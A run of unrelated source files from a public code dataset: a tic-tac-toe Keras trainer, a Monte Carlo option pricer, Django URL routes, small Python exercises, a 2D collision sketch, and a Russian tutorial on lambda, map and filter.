tf.keras.Input(shape=(9, 2))\n reshape = tf.keras.layers.Reshape((18,))(inputs)\n hidden0 = tf.keras.layers.Dense(p, activation='relu')(reshape)\n hidden1 = tf.keras.layers.Dense(q, activation='relu')(hidden0)\n outputs = tf.keras.layers.Dense(9, activation='sigmoid')(hidden1)\n Q_model = tf.keras.Model(inputs=inputs, outputs=outputs, name=\"Q_model\")\n opt = tf.keras.optimizers.Adam(learning_rate=r)\n Q_model.compile(loss=\"mean_squared_error\", optimizer=opt, metrics=[\"accuracy\"])\n return Q_model\n\n\ndef update_Q(pq, n, alpha):\n Q_old = Q_model(pq.reshape((1,9,2)))\n Q_new = np.zeros((9))\n for i in range(9):\n for j in range(n):\n finished, reward, pq1, response = step(pq, i)\n if finished:\n Q_new += reward * ee[i]\n else:\n Q_new += np.max(Q_model(pq1.reshape(1,9,2))[0]) * ee[i]\n Q_new /= n\n Q_update = (1 - alpha) * Q_old + alpha * Q_new\n return Q_update\n\n\ndef train_Q_once(n, m, o, alpha):\n i = np.random.choice(len(all_states), m)\n x = np.array([all_states[i0] for i0 in i])\n y = np.array([update_Q(x[i0], n, alpha) for i0 in range(m)])\n Q_model.fit(x, y, epochs=o)\n\n\n######################################################################\n# This section attempts to train a model to play noughts and \n# crosses. The model takes a game state as input and produces\n# a probability vector of length 9 as output.\n\ndef make_model(p=20, q=20, r=0.001):\n global model\n inputs = tf.keras.Input(shape=(9, 2))\n reshape = tf.keras.layers.Reshape((18,))(inputs)\n hidden0 = tf.keras.layers.Dense(p, activation='relu')(reshape)\n hidden1 = tf.keras.layers.Dense(q, activation='relu')(hidden0)\n outputs = tf.keras.layers.Dense(9, activation='softmax')(hidden1)\n model = tf.keras.Model(inputs=inputs, outputs=outputs, name=\"model\")\n opt = tf.keras.optimizers.Adam(learning_rate=r)\n model.compile(loss=\"categorical_crossentropy\", optimizer=opt, metrics=[\"accuracy\"])\n return model\n\n\ndef save_model():\n l = model.layers\n p = l[3].input_shape[1]\n q = l[4].input_shape[1]\n model_dir = os.path.join(models_dir, 'ox_model_' + repr(p) + '_' + repr(q))\n model.save(model_dir)\n\n\ndef load_model(p=20, q=20):\n model_dir = os.path.join(models_dir, 'ox_model_' + repr(p) + '_' + repr(q))\n model = tf.keras.models.load_model(model_dir)\n return model\n\n\n# This function applies the model to a game state pq to generate\n# a probability distribution on the board positions, and then \n# selects a position randomly in accordance with that distribution.\n# (If the model is not well-trained then the move may be illegal, \n# resulting in an immediate loss.)\ndef model_move(pq, player=0):\n if player == 0:\n pq0 = pq.copy()\n else:\n pq0 = swap(pq.copy())\n prob = model.predict(pq0.reshape(1, 9, 2))[0]\n choices = range(9)\n return np.random.choice(choices, p=prob)\n\n\n# This function displays the given game state as an image \n# using matplotlib\ndef show_board(pq, winner=None):\n col_o = 'red'\n col_x = 'blue'\n if winner == 0: col_x = 'lightblue'\n if winner == 1: col_o = 'lightcoral'\n fig, ax = plt.subplots(figsize=(4, 4))\n ax.set_axis_off()\n ax.set_xlim((0, 3))\n ax.set_ylim((0, 3))\n ax.add_line(matplotlib.lines.Line2D([1, 1], [0, 3], color='grey'))\n ax.add_line(matplotlib.lines.Line2D([2, 2], [0, 3], color='grey'))\n ax.add_line(matplotlib.lines.Line2D([0, 3], [1, 1], color='grey'))\n ax.add_line(matplotlib.lines.Line2D([0, 3], [2, 2], color='grey'))\n for i in range(3):\n for j in range(3):\n k = i+3*j\n if pq[k, 0] == 1:\n ax.add_patch(matplotlib.patches.Circle([i + 0.5, j + 0.5], 0.3, color=col_o, fill=False))\n if pq[k, 1] == 1:\n ax.add_line(matplotlib.lines.Line2D([i + 0.2, i + 0.8], [j + 0.2, j + 0.8], color=col_x))\n ax.add_line(matplotlib.lines.Line2D([i + 0.2, i + 0.8], [j + 0.8, j + 0.2], color=col_x))\n\n\n# This function prints an ASCII art representation of the specified game state\ndef show_board_ascii(pq, winner=None):\n sym_o = 'O'\n sym_x = 'X'\n if winner == 0: sym_x = 'x'\n if winner == 1: sym_o = 'o'\n s = '---\\n'\n for j in range(3):\n for i in range(3):\n k = i+3*(2-j)\n t = '#'\n if pq[k, 0] == 1: t = sym_o\n if pq[k, 1] == 1: t = sym_x\n s = s + t\n s = s + '\\n'\n s = s + '---'\n print(s)\n\n\n# This function plays a game.\n# It assumes that player_o and player_x are functions like\n# random_move, suggest_move, input_move and model_move:\n# they should accept a game state and player index, and \n# return a board position. By default play_game() returns\n# the final board position and the index of the winner \n# (0 for O, 1 for X). If the return_moves argument is true\n# it also returns a list moves = [moves_o, moves_x] \n# specifying the moves taken in order.\ndef play_game(player_o, player_x, return_moves=False):\n pq = empty_board.copy()\n winner = None\n moves_o = []\n moves_x = []\n while True:\n if len(plays(pq)) == 0:\n break\n i = player_o(pq, 0)\n moves_o.append(i)\n if i is None or pq[i, 0] == 1 or pq[i, 1] == 1:\n winner = 1\n break\n add_o(pq, i)\n if has_win(pq, 0):\n winner = 0\n break\n if has_win(pq, 1):\n winner = 1\n break\n if len(plays(pq)) == 0:\n break\n i = player_x(pq, 1)\n moves_x.append(i)\n if i is None or pq[i, 0] == 1 or pq[i, 1] == 1:\n winner = 0\n break\n add_x(pq, i)\n if has_win(pq, 0):\n winner = 0\n break\n if has_win(pq, 1):\n winner = 1\n break\n if return_moves:\n return pq, winner, [moves_o, moves_x]\n else:\n return pq, winner\n\n\n# Here it is assumed that pq is a game state and that the specified\n# player has chosen to play in position i. If that is illegal,\n# then the game ends with no change to the game state and a reward\n# of -5. Otherwise, we update the game state with the chosen move.\n# If this does not lead to an immediate win and there is still some\n# blank space, then we update again with a randomly selected move\n# by the opponent. The reward is now set to be +1 for a win, -1\n# for a loss, and 0 if neither player has won. The function returns:\n# + a boolean value to indicate whether the game has now finished\n# + the reward\n# + the new game state\n# + the position where the opponent played, if applicable.\ndef step(pq, i, player=0):\n if i is None or pq[i, 0] == 1 or pq[i, 1] == 1:\n return True, -5, pq, None\n pq1 = pq + eee[i, player]\n if has_win(pq1, player):\n return True, 1, pq1, None\n if len(plays(pq1)) == 0:\n return True, 0, pq1, None\n j = random_move(pq1, 1-player)\n pq2 = pq1 + eee[j, 1-player]\n if has_win(pq2, 1-player):\n return True, -1, pq1, j\n if len(plays(pq2)) == 0:\n return True, 0, pq2, j\n return False, 0, pq2, j\n\n\n# This function plays a game using model_move vs random_move, but gathers \n# various auxiliary information along the way which can be used for \n# policy gradient learning. This is not working correctly at the moment.\n# It is not clear whether the algorithm is incorrect or the training \n# hyperparameters are inappropriate.\ndef play_game_monitored():\n global model\n pq = empty_board.copy()\n grads = None\n game_reward = 0\n loss_fn = tf.keras.losses.get(model.loss)\n moves = [[],[]]\n if np.random.randint(2) == 1:\n move_x = np.random.randint(9)\n moves[1].append(move_x)\n pq = eee[move_x, 1].copy()\n m = 0\n rho = 0.9\n theta = 1\n num_vars = len(model.trainable_variables)\n while True:\n if len(plays(pq)) == 0:\n break\n with tf.GradientTape() as tape:\n prob = model(pq.reshape(1, 9, 2))[0]\n prob1 = prob.numpy().astype('float64')\n prob1 /= prob1.sum()\n choices = range(9)\n move_o = np.random.choice(choices, p=prob1)\n moves[0].append(move_o)\n loss = loss_fn(ee[move_o], prob)\n new_grads = tape.gradient(loss, model.trainable_variables)\n if m == 0:\n grads = new_grads\n else:\n for j in range(num_vars):\n grads[j] = (rho * (1 - theta) * grads[j] + (1 - rho) * new_grads[j])/(1 - theta * rho)\n m = m + 1\n theta = theta * rho\n if move_o is None or pq[move_o, 0] == 1 or pq[move_o, 1] == 1:\n game_reward = -5\n break\n add_o(pq, move_o)\n if has_win(pq, 0):\n game_reward = 1\n break\n if has_win(pq, 1):\n game_reward = -1\n break\n if len(plays(pq)) == 0:\n break\n move_x = random_move(pq, 1)\n moves[1].append(move_x)\n add_x(pq, move_x)\n if has_win(pq, 0):\n game_reward = 1\n break\n if has_win(pq, 1):\n game_reward = -1\n break\n for j in range(num_vars):\n grads[j] = -game_reward * grads[j]\n return game_reward, grads, moves, pq\n\n\n# The function legal_loss(pq, prob) expects pq to be a game state and\n# prob to be a probability vector of length 9, interpreted as the \n# probabilities of playing in positions 0,..,8. It returns the \n# probability of playing an illegal move, i.e. of playing in a \n# position that is already occupied.\ndef legal_loss(pq, prob):\n oo = tf.constant([[1],[1]], dtype=tf.float32)\n return tf.reshape(tf.linalg.matmul(tf.reshape(prob,[-1,1,9]),tf.linalg.matmul(pq,oo)),[-1])\n\n\ndef use_legal_loss(on=True):\n global model\n if on:\n model.compile(loss=legal_loss, optimizer=model.optimizer)\n else:\n model.compile(loss=\"categorical_crossentropy\", optimizer=model.optimizer)\n\n\ndef set_learning_rate(r=0.01):\n global model\n tf.keras.backend.set_value(model.optimizer.learning_rate, r)\n\n\n# This function trains the model so that it only plays legal moves.\n# It does not attempt to ensure that the moves are sensible.\ndef train_model_rules():\n global model\n if model is None:\n make_model()\n use_legal_loss(True)\n model.compile(loss=legal_loss, optimizer=model.optimizer)\n st = tf.constant(all_states, dtype=tf.float32)\n model.fit(st, st, epochs=20)\n use_legal_loss(False)\n\n\n# This function trains the model to replicate the behaviour of the\n# suggest_move() function\ndef train_model_suggestions():\n global model\n if model is None:\n make_model()\n use_legal_loss(False)\n model.fit(all_dataset, epochs=EPOCHS)\n\n\n# This function attempts (unsuccessfully, for the moment) to train the \n# model using policy gradient learning.\ndef train_model_reinforce(num_games=10, num_loops=10):\n global model\n if model is None:\n make_model()\n use_legal_loss(False)\n\n num_vars = len(model.trainable_variables)\n for i in range(num_loops):\n total_reward = 0\n print('Loop ' + repr(i))\n grads = []\n for j in range(num_games):\n reward, new_grads, moves, pq = play_game_monitored()\n grads.append(new_grads)\n total_reward += reward\n print('Total reward: ' + repr(total_reward))\n mean_grads = [\n tf.reduce_mean([grads[j][i] for j in range(num_games)],0)\n for i in range(num_vars)\n ]\n model.optimizer.apply_gradients(\n zip(mean_grads, model.trainable_variables)\n )\n\n\n######################################################################\n\n# make_model()\n# train_model_rules()\n\n# model = tf.keras.models.load_model('models/ox_model_20')\n\n# while True:\n# rr, gg, mm, bb = play_game_monitored()\n# print([rr,mm])\n# show_board_ascii(board_from_moves(mm))\n\n# make_Q_model()\n\n# train_Q_once(5,5,5,0.5)\n\nmake_model()\n","repo_name":"NeilStrickland/ml_exact","sub_path":"python/ox.py","file_name":"ox.py","file_ext":"py","file_size_in_byte":20137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7271818459","text":"import math\nfrom mcpele1.montecarlo.template import np\nfrom mcpele1.montecarlo.mc import MC\nfrom mcpele1.takestep.gaussian_coords_displacement import SimpleGaussian\nfrom mcpele1.action.record_energy_time_series import RecordEnergyTimeSeries\n\n\"\"\"\ncreate a Option class to define the potential of the Monte Carlo simulation\n\"\"\"\n\n\n# potential\n\nclass Option:\n def __init__(self, stock_price, strike_price, risk, volatility, tenor, CorP, Steps):\n self.S= stock_price\n self.K = strike_price\n self.r = risk\n self.v = volatility\n self.T = tenor\n self.CorP = CorP\n self.Steps = Steps#dimension\n\n def get_energy(self, x, mcrunner):\n deltaT = self.T/self.Steps\n y = self.S\n for i in range(0, len(x)):\n\n y= y*math.exp(((self.r-((self.v*self.v)/2))*deltaT)+ (self.v*math.sqrt(deltaT)*x[i]))\n\n return y\n \n \n\nclass Option_Price:\n energy_list: np.ndarray\n S= 50\n K = 50\n r = 0.05\n v =0.5\n T =1\n CorP = \"C\"\n Steps = 100 \n samples = 10000\n\n def __init__(self):\n #steps and dimension\n self.ndim = self.Steps #proxy for number of time steps, linearly the system in one dimensional\n self.samples = self.samples\n self.potential = Option(self.S, self.K, self.r, self.v, self.T, self.CorP, self.Steps)\n #setting up the simulator\n self.mc = MC(self.potential, np.zeros(self.ndim), 1)\n #generating coords(normal random numbers)\n self.takestep = SimpleGaussian(42, self.ndim)\n self.mc.set_take_step(self.takestep)\n self.Recorded_Energy = RecordEnergyTimeSeries(1,1)\n #collecting all energies of each simulation\n self.mc.add_action(self.Recorded_Energy)\n self.mc.run(self.samples)\n self.energy_list = np.array(self.Recorded_Energy.get_energy_time_series())\n\nif __name__ == \"__main__\":\n optprc = Option_Price()\n energy_l = optprc.energy_list\n #Substract with stock price and remove all negatives\n energy_l = energy_l - optprc.K\n energy_l[energy_l<0]=0\n ans = np.sum(energy_l)/optprc.samples*math.exp(-optprc.r*optprc.T )\n print(\"option price:\",ans )\n","repo_name":"MohammedZayyam/mcpele1","sub_path":"example/calculate_option_price.py","file_name":"calculate_option_price.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"36045360507","text":"from django.conf.urls import patterns, url\n\nfrom students.views import (GroupListView, GroupDetailsView, EditGroupView,\n EditStudentView, DeleteStudent, DeleteGroup)\n\n\nurlpatterns = patterns('',\n url(r'^$', GroupListView.as_view(),\n name='index-students'),\n url(r'^groups/$', GroupListView.as_view(),\n name='group_list-students'),\n url(r'^group/(?P\\d+)/$', GroupDetailsView.as_view(),\n name='group_details-students'),\n\n url(r'^group/add/$', EditGroupView.as_view(),\n name='group_add-students'),\n url(r'^group/(?P\\d+)/edit/$', EditGroupView.as_view(),\n name='group_edit-students'),\n\n url(r'^student/(?P\\d+)/edit/$', EditStudentView.as_view(),\n name='student_edit-students'),\n url(r'^student/add/$', EditStudentView.as_view(),\n name='student_add-students'),\n\n url(r'^group/(?P\\d+)/delete$', DeleteGroup.as_view(),\n name='delete_group-students'),\n url(r'^student/(?P\\d+)/delete$', DeleteStudent.as_view(),\n name='delete_student-students'),\n)\n","repo_name":"purintibkaew/db-management","sub_path":"apps/students/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"27724100968","text":"version = list(map(int, input().split(\".\")))\r\n\r\nversion[-1] += 1\r\nif version[-1] == 10:\r\n version[-1] = 0\r\n version[-2] += 1\r\nif version[-2] == 10:\r\n version[-2] = 0\r\n version[-3] += 1\r\n\r\nprint(\".\".join(str(number) for number in version))\r\n\r\n\r\n\r\n","repo_name":"slavcho179/SoftUniCourse","sub_path":"Fundamentals/DataStructures/Lists/ListAdvanced/next_version.py","file_name":"next_version.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"29"} +{"seq_id":"6641804242","text":"# This script wraps the innerhtml string of a page with the appropriate , and tags.\n# This would enable Tika to parse it correctly. \n\nimport sys\nimport os\n\ndef list_files(dir): \n r = [] \n subdirs = [x[0] for x in os.walk(dir)] \n for subdir in subdirs: \n files = os.walk(subdir).next()[2] \n if (len(files) > 0): \n for file in files: \n r.append(subdir + \"/\" + file) \n return r \n\ndef log(msg):\n\tprint(msg)\n\ndef main(argv=None):\n\targv = sys.argv[1:]\n\ttry:\n\t\tinputDir = argv[0]\n\t\toutputDir = argv[1]\n\t\tappendString = argv[2]\n\texcept:\n\t\tprint(\"Usage \")\n\t\texit()\n\tlog(\"Setting input dir as %s and outputDir as %s\"%(inputDir, outputDir))\n\tif not os.path.exists(outputDir):\n\t\tos.makedirs(outputDir)\n\n\tfiles = list_files(inputDir)\n\tfor file in files:\n\t\twith open(file,\"r\") as f:\n\t\t\tlog(\"Processing file \" + f.name)\n\t\t\tcontent = f.read()\n\t\t\tcontent = \" \" + content + \"\"\n\t\t\toutFile = outputDir+\"/\" + appendString + os.path.basename(file)+\".html\"\n\t\t\twith open(outFile,\"w\") as out:\n\t\t\t\tlog(\"Writing file \" + os.path.basename(outFile))\n\t\t\t\tout.write(content)\n\t\t\t\tos.utime(outFile, (os.path.getctime(file), os.path.getctime(file)))\n\t\t\t\tout.close()\n\t\t\tf.close()\n\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"sujen1412/memex-scripts","sub_path":"html-cca-converter/html_converter.py","file_name":"html_converter.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"74771715279","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\n\n\n# In[2]:\n\n\npd.read_excel('data.xlsx')\n\n\n# In[3]:\n\n\nb=pd.read_excel('data.xlsx',index_col='Date')\nb\n\n\n# In[4]:\n\n\na=pd.Series([1,2,3])\na.sum()\n\n\n# In[5]:\n\n\nb.sum()\n\n\n# In[6]:\n\n\nb.sum(axis='index')\n\n\n# In[7]:\n\n\nb.sum(axis=0)\n\n\n# In[8]:\n\n\nb.sum(axis=1)\n\n\n# In[9]:\n\n\nb.sum(axis='columns')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"fozouni/data_science","sub_path":"Code Session 9 Pandas.py","file_name":"Code Session 9 Pandas.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"29"} +{"seq_id":"21127384375","text":"from mysql_connector import connection\nimport menu\n\n# adds publisher to table\ndef addPublisher(name, phone, city):\n cursor = connection.cursor()\n query = \"SELECT EXISTS(SELECT name FROM Publisher WHERE name = %s)\"\n record = (name, )\n cursor.execute(query, record)\n \n result = cursor.fetchall()\n \n if str(result) == \"[(1,)]\":\n return \"Publisher already exists.\"\n \n else: \n query = \"\"\"INSERT INTO Publisher(name, phone, city) VALUES (%s, %s, %s)\"\"\"\n record = (name, phone, city)\n cursor.execute(query, record)\n \n connection.commit()\n result = \"Added \" + str(cursor.rowcount) + \" publisher to table.\\n\"\n return (result)\n \n\n","repo_name":"fjosea10/BookManager","sub_path":"publisher_dao.py","file_name":"publisher_dao.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26738740444","text":"# print all integers from 0 to 150\ni = 0\nwhile i <= 150:\n print(i)\n i = i+1\n\n# print all the multiples of 5 from 5 to 1,000\ni = 0\nwhile i <= 1000:\n print(i)\n i = i + 5\n\n# print integers 1 to 100 if divisible by 5, pirnt \"Coding\" instead. if divisible by 10, print \"Coding Dojo\"\ni = 1\nwhile i <= 100:\n if i%10 == 0:\n print('Coding Dojo')\n elif i%5 == 0:\n print('Coding')\n else:\n print(i)\n i = i+1\n\n# add odd integers from 0 to 500,000 and print the final sum\ni = 1\nsum = 0\nwhile i < 500000:\n if i > 500000-2:\n print(sum)\n sum = sum + i\n i = i + 2\n\n# print positive numbers starting at 2018, counting donw by fours\ni = 2018\nwhile i > 0:\n print(i)\n i = i - 4\n\n# set three variables:lowNum, highNum, mult, starting at lowNum and going through highNum, print only the integers that are a multiple of mult\nlowNum = 3\nhighNum = 30\nmult = 3\nx = 0\nfor x in range(lowNum, highNum + 1, mult):\n print(x)","repo_name":"zionhjs/11-25-Python","sub_path":"tests/for_loop.py","file_name":"for_loop.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41692117042","text":"import pygame as pg\nfrom math import floor, ceil\n\n\npg.font.init()\n\n\nWIN_WIDTH, WIN_HEIGHT = 1920, 1080\nBLOCK_SIZE = 60\nGRID_SIZE = 16\nGRID_START = ((WIN_WIDTH - BLOCK_SIZE * GRID_SIZE) / 2, (WIN_HEIGHT - BLOCK_SIZE * GRID_SIZE) / 2)\nPLAYER_SPEED = .01\n\nBACKGROUND_COLOR = (50, 50, 50)\nGRID_COLOR = (150, 150, 150)\nSELECTION_COLOR = (75, 75, 75)\nWALL_SELECTION_COLOR = (125, 125, 125)\nWALL_COLOR = (150, 150, 150)\nTEXT_COLOR = (255, 255, 255)\nPLAYER_COLOR = (0, 0, 255)\nAABB_COLOR = (255, 0, 0)\nLINE_HEIGHT = 24\nLINE_WIDTH = 2\n\nEMPTY = 0\nWALL = 1\n\nFONT = pg.font.SysFont(\"Arial\", 24)\n\n\ndef to_screen_coords(grid_coords):\n return int(GRID_START[0] + grid_coords[0] * BLOCK_SIZE), \\\n int(GRID_START[1] + grid_coords[1] * BLOCK_SIZE)\n\n\n# Not perfect, but works pretty fine\nclass AABB:\n def __init__(self, pos, size):\n self.pos = pos\n self.size = size\n self.last_pos = pos\n self.delta = (0, 0)\n\n # Moves the box immediately\n def move(self, dx, dy):\n self.pos = (self.pos[0] + dx, self.pos[1] + dy)\n self.delta = (self.delta[0] + dx, self.delta[1] + dy)\n\n # But then resolves the collision moving the box along one axis at a time\n def collide(self, others):\n self.pos = self.last_pos\n\n self.pos = (self.pos[0], self.last_pos[1] + self.delta[1])\n for other in others:\n if self.delta[1] != 0 and other.pos[0] - self.size[0] < self.pos[0] < other.pos[0] + other.size[0]:\n if self.delta[1] > 0 and self.last_pos[1] <= other.pos[1] - self.size[1] < self.pos[1]:\n self.pos = (self.pos[0], other.pos[1] - self.size[1])\n elif self.pos[1] < other.pos[1] + other.size[1] <= self.last_pos[1]:\n self.pos = (self.pos[0], other.pos[1] + other.size[1])\n\n self.pos = (self.last_pos[0] + self.delta[0], self.pos[1])\n for other in others:\n if self.delta[0] != 0 and other.pos[1] - self.size[1] < self.pos[1] < other.pos[1] + other.size[1]:\n if self.delta[0] > 0 and self.last_pos[0] <= other.pos[0] - self.size[0] < self.pos[0]:\n self.pos = (other.pos[0] - self.size[0], self.pos[1])\n elif self.pos[0] < other.pos[0] + other.size[0] <= self.last_pos[0]:\n self.pos = (other.pos[0] + other.size[0], self.pos[1])\n\n self.last_pos = self.pos\n self.delta = (0, 0)\n\n\ndef main():\n screen = pg.display.set_mode((1920, 1080))\n pg.display.set_caption(\"Physics\")\n\n def text(line, value):\n screen.blit(\n FONT.render(value, True, TEXT_COLOR),\n (10, 10 + line * LINE_HEIGHT)\n )\n\n def block(coords, color):\n screen_coords = to_screen_coords(coords)\n pg.draw.rect(\n screen, color,\n pg.Rect(\n screen_coords[0],\n screen_coords[1],\n BLOCK_SIZE, BLOCK_SIZE\n )\n )\n\n def aabb(box, color):\n pos = to_screen_coords(box.pos)\n pg.draw.rect(\n screen, color,\n pg.Rect(\n pos[0] + LINE_WIDTH,\n pos[1] + LINE_WIDTH,\n box.size[0] * BLOCK_SIZE - LINE_WIDTH,\n box.size[1] * BLOCK_SIZE - LINE_WIDTH\n ), LINE_WIDTH\n )\n\n grid = [[EMPTY for y in range(GRID_SIZE)] for x in range(GRID_SIZE)]\n player = AABB((.125, .125), (.75, .75))\n\n while True:\n for e in pg.event.get():\n if e.type == pg.QUIT:\n return\n\n screen.fill(BACKGROUND_COLOR)\n\n mouse_real_x, mouse_real_y = pg.mouse.get_pos()\n sel_x = floor((mouse_real_x - GRID_START[0]) / BLOCK_SIZE)\n sel_y = floor((mouse_real_y - GRID_START[1]) / BLOCK_SIZE)\n\n if 0 <= sel_x < GRID_SIZE and 0 <= sel_y < GRID_SIZE:\n pressed_buttons = pg.mouse.get_pressed()\n if pressed_buttons[0]:\n grid[sel_x][sel_y] = EMPTY\n elif pressed_buttons[2]:\n grid[sel_x][sel_y] = WALL\n\n pressed_keys = pg.key.get_pressed()\n\n if pressed_keys[pg.K_w]:\n player.move(0, -PLAYER_SPEED)\n elif pressed_keys[pg.K_s]:\n player.move(0, PLAYER_SPEED)\n\n if pressed_keys[pg.K_a]:\n player.move(-PLAYER_SPEED, 0)\n elif pressed_keys[pg.K_d]:\n player.move(PLAYER_SPEED, 0)\n\n aabbs = []\n \n for x in range(floor(player.pos[0]), floor(player.pos[0] + player.size[0]) + 1):\n for y in range(floor(player.pos[1]), floor(player.pos[1] + player.size[1]) + 1):\n if 0 <= x < GRID_SIZE and 0 <= y < GRID_SIZE and grid[x][y] == WALL:\n aabbs.append(AABB((float(x), float(y)), (float(1), float(1))))\n\n player.collide(aabbs)\n\n # Draw selection and walls\n\n for x in range(0, GRID_SIZE):\n for y in range(0, GRID_SIZE):\n if grid[x][y] == WALL:\n block((x, y), WALL_COLOR)\n\n if 0 <= sel_x < GRID_SIZE and 0 <= sel_y < GRID_SIZE:\n block((sel_x, sel_y), SELECTION_COLOR if grid[sel_x][sel_y] == EMPTY else WALL_SELECTION_COLOR)\n\n # Draw grid\n\n for x in range(0, GRID_SIZE + 1):\n pg.draw.line(\n screen, GRID_COLOR,\n to_screen_coords((x, 0)),\n to_screen_coords((x, GRID_SIZE))\n )\n\n pg.draw.line(\n screen, GRID_COLOR,\n to_screen_coords((0, x)),\n to_screen_coords((GRID_SIZE, x))\n )\n\n # Draw AABBs\n\n aabb(player, PLAYER_COLOR)\n for box in aabbs:\n aabb(box, AABB_COLOR)\n\n pg.display.flip()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"linewelder/mycraft-old","sub_path":"sketches/physics.py","file_name":"physics.py","file_ext":"py","file_size_in_byte":5741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"28918708441","text":"import pandas as pd\n\n'''\nUsing and sorting a multi-column index\n'''\n\ndef main(): \n df = pd.read_csv(\"data/phone_extensions.txt\", sep=r\"\\s+\", engine=\"python\")\n df.set_index(['FirstName', 'LastName'])\n df.sort_values(['LastName', 'FirstName'], inplace=True)\n print(df)\n\nmain()\n","repo_name":"seddon-software/python-course","sub_path":"src/16 Scientific Libraries/04 Pandas Advanced/12.multiindex.py","file_name":"12.multiindex.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"72985389199","text":"# ====================\n# Часть 1: lambda-функции, функции map и filter\n# ====================\n\n# массив слов для демонстрации работы алгоритмов сортировки\nword_list = [\"а\", \"автомат\", \"авто\", \"авиа\", \"ар\"]\n\n# по умолчанию функция сортировки списков list.sort() сортирует элементы списка как числа - по возрастанию или убыванию,\n# поэтому при сортировке строк работает следующий алгоритм: у каждой буквы в таблице символов есть свой числовой код.\n# Алгоритм сортировки (сортировка по возрастанию): # 1) берет первую букву каждого слова, определяет ее код,\n# 2) первым элементом в списке становится слово, начинающееся с наименьшего кода, 3) если таких слов несколько, берется следующая буква всех подходящих слов и определяется наименьший код до тех пор, пока не найдется следующее слово. Пример:\n# а, автомат, авто, авиа, ар -> а | автомат, авто, авиа, ар\n# автомат, авто, авиа, ар -> автомат, авто, авиа | ар (\"р\" 0xF0 имеет больший код, чем \"в\" 0xE2) -> авиа | автомат, авиа\n# и т.д.\n\nword_list.sort()\nprint(word_list)\n# вернет: а, авиа, авто, автомат, ар. То есть длина слова не влияет на результат сортировки\n\n# тем не менее, можно изменить поведение функции list.sort, написав собственную функцию сортировки:\n# кастомная функция сортировки. Возвращает длину слова, которую и использует list.sort\ndef sort_by_len(word):\n\treturn len(word)\n\nword_list.sort(key=sort_by_len)\n# вернет: а, ар, авто, авиа, автомат\nprint(word_list)\n\n# того же самого результата можно добиться, не загромождая свой код простыми маленькими функциями\n# lambda-функции - это функции, которые а) не имеют имени, б) создаются непосредственно в месте использования и сразу уничтожаются, в) записываются в одну строку, г) всегда возвращает значение, но без ключевого слова return\n\n# реализация кастомной сортировки того же списка при помощи lambda-фукции\nword_list.sort(key=lambda x: len(x))\n# вернет: а, ар, авто, авиа, автомат\nprint(word_list)\n\n# запись lambda x: len(x) эквивалентна\n# def sort_by_len(word):\n# \treturn len(word)\n\n# lambda-функцию можно присвоить переменной и тогда она не удалится. хотя все равно останется безымянной\nsort_by_len = lambda x: len(x)\nword_list.sort(key=sort_by_len)\n\n# функцию можно удалить так же, как любой другой объект:\ndel sort_by_len\n\n# для того, чтобы распространить функцию на все элементы списка, используются две функции:\n# filter - фильтр по условию. Если для элемента условие True, то элемент остается в списке. Если False - элемент пропускается\n# map - производит вычисление над каждым элементом списка\n# обе фукнции принимают два аргумента: 1) функция для обработки, 2) переменная, содержащая данные для обработки\n\n# создаем тестовый список numbers с числами от 0 до 99\nnumbers = list(range(0, 100))\n\n# выводим только четные числа (делятся на 2 без остатка)\n# вот так работает механизм, заложенный в функцию filter:\ndef check_even():\n\tfor number in numbers:\n\t\tif number %2 == 0:\n\t\t\treturn number\n\t\telse:\n\t\t\treturn False\n\n# пример отбора четных чисел из списка функцией filter:\neven_list = list(filter(lambda x: x%2 == 0, numbers))\nprint(even_list)\n\n# lambda-функцию можно запустить сразу в месте объявления. Передача параметра будет выглядеть так (проверка числа на четность):\nprint((lambda x: x%2 == 0)(2))\n\n# пример вычисления над каждым элементом списка. вычисление квадратов чисел функцией map:\nsquare_list = list(map(lambda x: x*x, numbers))\nprint(square_list)\n\n# пример вычисления над каждым элементом списка. вычисление квадратов чисел функцией map с условием - обрабатываем только четные числа:\nsquare_list = list(map(lambda x: x*x if x%2 == 0 else None, numbers))\n# на месте нечетных чисел будет значение, задаваемое в условии else, т.к. функция map, в отличие от filter, не умеет пропускать значения\nprint(square_list)\n\n# пример совместного использования map и filter. результатом будут все четные числа, возведенные в квадрат\nsquare_list_filtered = list(filter(lambda x: x is not None, map(lambda x: x*x if x%2 == 0 else None, numbers)))\nprint(f\"Совместное использование функций map и filter\\n {square_list_filtered}\")\n\n# ====================\n# Часть 2: генераторы списков\n# ====================\n\n# генераторы списков - специальный механизм Python, позволяющий создавать на лету новые списки как результат фильтрации или вычислений\n# применяются ТОЛЬКО к типу list!\n# следующее выражение даст тот же результат, что и функция filter над массивом numbers\neven_list2 = [x for x in numbers if x%2 == 0]\nprint(even_list2)\n\n# а это генератор - аналог функции map\neven_list3 = [x if x%2 == 0 else None for x in numbers]\nprint(even_list3)\n\n\n# ====================\n# Часть 3: практическое применение: работа с текстами\n# ====================\n\n# МАТЧАСТЬ: стоп-слова - это слова, не несущие смысловой нагрузки (предлоги, союзы, местоимения, частицы), которые 